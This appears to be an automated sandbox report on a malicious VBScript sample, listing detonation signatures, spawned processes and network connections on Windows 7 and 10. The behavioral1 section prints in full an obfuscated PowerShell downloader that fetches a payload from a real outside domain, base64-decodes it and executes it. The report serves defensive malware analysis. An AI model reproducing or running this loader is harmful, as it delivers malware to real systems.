Malware Analysis Report

2025-04-14 03:26

Sample ID 240612-skddsstbrr
Target 1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859.vbs
SHA256 1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859
Tags
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859

Threat Level: Likely malicious

The file 1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859.vbs was found to be: Likely malicious.

Malicious Activity Summary


Blocklisted process makes network request

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Runs ping.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-12 15:10

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 15:10

Reported

2024-06-12 15:13

Platform

win7-20240221-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2032 wrote to memory of 1716 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 2032 wrote to memory of 1716 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 2032 wrote to memory of 1716 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 2032 wrote to memory of 3036 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 2032 wrote to memory of 3036 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 2032 wrote to memory of 3036 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 2032 wrote to memory of 2288 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2032 wrote to memory of 2288 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2032 wrote to memory of 2288 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2032 wrote to memory of 2672 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2032 wrote to memory of 2672 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2032 wrote to memory of 2672 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2672 wrote to memory of 2844 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2672 wrote to memory of 2844 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2672 wrote to memory of 2844 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859.vbs"

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping %.%.%.%

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c dir

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$badehuset = 1;Function Tontiner($Pujas206){$Thoroughness=$Pujas206.Length-$badehuset;$Projektidxd114='Substring';For( $Mindetavlen252=5;$Mindetavlen252 -lt $Thoroughness;$Mindetavlen252+=6){$Slingers+=$Pujas206.$Projektidxd114.Invoke( $Mindetavlen252, $badehuset);}$Slingers;}function footbridges($Skattekorts){ . ($Revises) ($Skattekorts);}$Quinonic=Tontiner 'tagetM,stopoTambozNo.coi.endslHotsplDi.agaSp,nn/Repro5Carlo.Solol0 Flns Holdu(N nmeWDatofi ilymnsh.mmdRigsmoCunylwSlipks.emon RepiNAngelT U bo Berne1Sknke0Henb,.Raket0Court;Danne InsisWOktaliBivaanUnd.r6 Qual4Mortu;Gra m SikkxEroti6.rflj4Pol.e;Overc .upprBroadvSrhft:Bager1Nonsu2Retro1 Cont. G,lf0Films) Fera Non.eGLeptoe Hovec F nekUltraoSt,di/endo 2Ti.sm0 Loya1delre0Sulph0 ,usi1D.spo0rutt.1P sid PhotoFLaspriSmlderBromyeFamilfziggioSayabxSudat/Irela1Mesna2 Deon1Patr...koda0Audin ';$Personregisterets=Tontiner 'PomegUpluvisI,tereHo rorHyper-sjleaA Teo,gundese SandnH.rtytBlo,p ';$Fishwood=Tontiner 'Mi.eyhPantetIngvatAarenpPusslsDe.ar:Pen.i/H.lic/,remkwTriksw GarrwVrtsh. E,feaPropatOdocoo GuldramplidSchiseFalc gLomba.T,melcPalsyo EmblmFring.TronsbWithirdolph/Sa,meU Din,pAbefehUn.ero SkilaRegarrHelnodP,radiSprotnBssesgSejlk. Cow,h t.eshLifelpColum ';$counterintelligence=Tontiner 'Sam,e>Exo,r ';$Revises=Tontiner ',indeiTagdkeOutblxkvajp ';$Maldiverne='Pedeller';$supertranscendentness = Tontiner 'Inspie.epyscCackehOpsigoHecto Fimbr%Japhea ClaupSov,hp torhdcomplaPrim.tAttraa Pass% rees\vernoD,enfdiSminto Mul.m.capueMrknidReconeSkiftsFavou. atalMTranqeO.kalt Bagt Snows&resti& Velk BuddieDixiecHuyghh TovroTegns edit elv ';footbridges (Tontiner ' stm$B rdegMuckilFj rto Salvb embrafemdolAfmel:GrundARundscAfrivhBenztiFarten C,areLet,rs.nganeH.rti=Submo(RetskcSk,rlmAvlstdporte S.mit/Udlsec Neds F lia$Sil csNih,luTurbopAmpuleBrepirRadiot otalrBefataM,bilnGeo gsAc,accSubsteDis,anExterdRef reFlappn Atl.tJustinAdteve Tkk,s Frigs.dels)Peni, ');footbridges (Tontiner 'kines$pe.ocg.dvarlM skio,icrob UltraDoughlSulph:ForurLNvnspa teruEmielgTudsehThr.nipul cnMavengeffeksLumb.=Woozl$RekorFPigmeiSh,iksLion.hInverwChrisoBiennoSeq.adSubal.Skil sRressp Indkl Bla iFrkentPo os(Hepca$UdvikcPaedeoStoppuOliernfo,nttPr,queWa.slr Urugiudst n M,cht ,ilbeDosmelDe.idlFortliHalslg Un.oeKons.nsnigvcZarereBarra)Moles ');$Fishwood=$Laughings[0];$Scrotocele= (Tontiner 'Discr$ferskgPreorlUncisokathab AeroaSalutl,elta:OpvarD ,omiiDr,kmg ,npatBlgeteAnticrU dervFo earBr.shkSnitteTrstetTwa ksImpot= To hNPiiabeN.stiw Iva.-Skot,Opoly,bHorrijTebreeSkuffcpli,stSkarp OctahSsho.ey sekss M,rrtSter.ePyro.mBrnds. elonNUdra,eDi.kntFatti. UndeWNud,leCrowsb ShadC TelelLasari Bry.eSplennRevist');$Scrotocele+=$Achinese[1];footbridges ($Scrotocele);footbridges (Tontiner 'Potcr$Du.frD ulvei pidng jordtVind,e rratrDematvFloutr Svankuncohe UnsttEft.rs .ibb.AndroHStrene FebraSvagsdClosee.ierorGlobasAncyl[,rgen$UnworPIn,pieSpa,crsa.chsUn eroUdha,nS,ondrPerr.eFortag CycliAmendsNissetGeneseStolerStilkeAppritUnforsMower] Para=Swish$RelenQEf.eruKlodsiAgarwnParanoFedt nUnderi th.ecRebu, ');$Biloculina=Tontiner ',etta$FaresDPsychiTil agBurg.tPleureSieror,roduvMicror DirikHavareFlkkst ,ecosNonle. RustDAr,afoIndexwSkrebnF rtflBluebo MissaRdkrid PhotF.iramiUncralPortheKe me(clegg$EnergFColliiAkties Prophsto hwSkraaoSt kno.ermidBenme,Lexic$ J.veAS.rmulOvisiiKyo,dyPolonaNu,anhrumne)Fortr ';$Aliyah=$Achinese[0];footbridges (Tontiner 'B.rtv$RechugSmreolU kreoByggebD.leva EqualSamme:OpsluSB,shatJerimeRegendLyksah Sp,oo MalerScorbsWarileSkiftsGodtg=Valgb(Mo,saTMhedeeDownpsCathatStint- poliPStortaPeript UndehUdva, Subra$EgetrABeciflCampiiInaccy SystaSva,eh S,pr)Ne to ');while (!$Stedhorses) {footbridges (Tontiner ' .ile$Opposga omalEnvisoOpl ibBylanaTe eglbogst:frid.T,errueVaabesB,kletAs ondMi era onotPep,oaForefsreceptUnove=Tilve$fribrt E,ucr M touSkorteAlmue ') ;footbridges $Biloculina;footbridges (Tontiner ' Art S galetUnthiaVi,gurlobsttNonde-So,tySIdiomlIntere BarbeDokkepNonda sympt4 Udbl ');footbridges (Tontiner ' Rele$ llomgDena l nkoo .pstbSkovma InvalLser,:QuotiSTescht FaneeJuleedImpl,hSatsboParafrAc essSwa.geTve psCori = Dor,(ArgenT Gglee Bo.bsDechitAdenf- l mmPNaturaUtinatDecemh Foru Prere$GymnaAB medlSayabiMaveryOver,aFannehButik)methy ') ;footbridges (Tontiner ' Osti$fecu gPeraglHvaeloIndolb millaNontalVanva:,uperPTreelrL,rici For,oTanderAs.etiDubbet,orhaespaadtValgbsUvilkh.njouaTo.tovnas.iest,kvrPar veRistesArina=Biote$ ProrgGu,sblBil coBedr.b Hunda horilAuxes:MullsAGodkefMumhotHumusvAffaltSk ort Solhe ReinlBellis Tal.eFuld,rTempenPrenieTu nd+print+Sorte% Pitc$GoldfL erreaSlynguTenemgT asshPr tfiStamfnPres.g,xtras,orde.HalvbcP gmsoUnox,uCentenTotidtDagli ') ;$Fishwood=$Laughings[$Prioritetshaveres];}$Fantasteriers79=344305;$stjernetydere=28583;footbridges (Tontiner 'Fej p$Nondog MdealCoaguoTosprbAntr aLangvlFockl:Lo.dsPHurlsr,ammeo Uds tTo reeInexprNeutrvKodeliEq.iltFortry kons hazza=Afh.t TrophGReinceStorktPelar-SkimmCSph.ro .oksnIrv,nt .raneDavennBajett Faam Messi$ oma,A Ubbel,hirti ProvyPostmaA.ernhRa.pe ');footbridges (Tontiner ' G.ns$Al,ohgSupral C,enoAvi.sbTropeaunlizlStvfr:StonaUJammenKardic SlesoTittinS xtifYel,eiMarg.nUnbrae F agd Pestl BlesyRu.ri Luxa.=Out.i Dow.[Tr dvSNednoy Prias.egirtCranieMisremAfd l.inte.CElemeoRed,en N vev DigeeSoie.rFilostAr.it]Repub:Boje.:AlnatFPrmierN tiooPageamHecatBDecoraScribsOmnifeBerid6sophi4GartnSPergatBarderEmbariApomenUno,igOpist(Odiou$TilflPKrakerTiosuosubsitPhotoeSka.trFolktv,orsfihariat Rou,yVerde)Menne ');footbridges (Tontiner 'Syrne$GaskrgFags lUnquao .ageb Bal,aLykkelfarts: R.apFDehuma Te,mr,ochoeBemintMul,irNomaduTr cteVedhnnNatted plamekleptsFrake1Pleje6S tte1Sving Ou.gr=Besid Atom[KronrSN,deryJ.nglsCathotSstvleHjortm ,opl.UnconTBeskyeForlnxquadrtPha.t. Her EPibalnFej,lcPhoebo orddLovlyi,ambunMars g O.ts].kraa:De.ug: Ol.nACentrSAbonnCpiebaI FordIUforg.Ser.oGRafleeGespetSu asSA,falt .jerrHoverimumpenSpoong ilei(therm$TrochUSuckunRokkecLaroioEmnean,olsjfKneppiGrnthnYomereBlunkdFornol SkruyDefin)Vanre ');footbridges (Tontiner 'modal$Knowhgta.etlDeem,oTerutbUnestaFyrbdlKant :desanOOrdinvN,tteeru isr arsfPlantoTabagrDysfamthoroyBesrgnUnresdRig.ie,atterSpgel1Aften6Cavea3 Gens=Trret$ LysrFenddaaRadbrr,lcedeZaport SverrSemimuNature Til nKortld Raine DepasStift1Molap6Vindi1Rhizo.Ildsls ArcauSprgebBill.sPilf tSa mer PrakiCaymanAppregbasep( Emod$BondeFS.iffaGrisonSkuldtUnex.a Paa sBerlitSkib.e.olkerbnderi Pla.eBlephrRegros tork7Hygum9E.spe,Opspr$preobsUdsg.tLoyrejSidsteBeto.r AutonLigese de.otOvertyAdresdResp,eGr,ahr Antie.eods)craju ');footbridges $Overformynder163;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Diomedes.Met && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 www.atordeg.com.br udp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp
US 192.185.216.185:443 www.atordeg.com.br tcp

Files

memory/2672-4-0x0000000002AB0000-0x0000000002B30000-memory.dmp

memory/2672-5-0x000000001B630000-0x000000001B912000-memory.dmp

memory/2672-6-0x0000000002860000-0x0000000002868000-memory.dmp

memory/2672-7-0x0000000002AB0000-0x0000000002B30000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-12 15:10

Reported

2024-06-12 15:13

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859.vbs"

Signatures

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 560 wrote to memory of 1872 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 1872 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 3652 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 3652 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 3404 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 3404 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 1292 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 1292 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 1720 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 1720 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 2692 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 2692 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 4752 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 4752 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 3584 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 3584 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 8 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 8 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 928 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 928 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 2496 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 2496 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 4412 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 4412 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 3736 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 3736 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 4356 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 4356 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 2988 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 2988 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 3824 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 3824 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 3480 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 3480 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 3280 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 3280 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 1068 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 1068 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 2968 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 2968 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 2328 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 2328 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 5060 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 5060 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 524 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
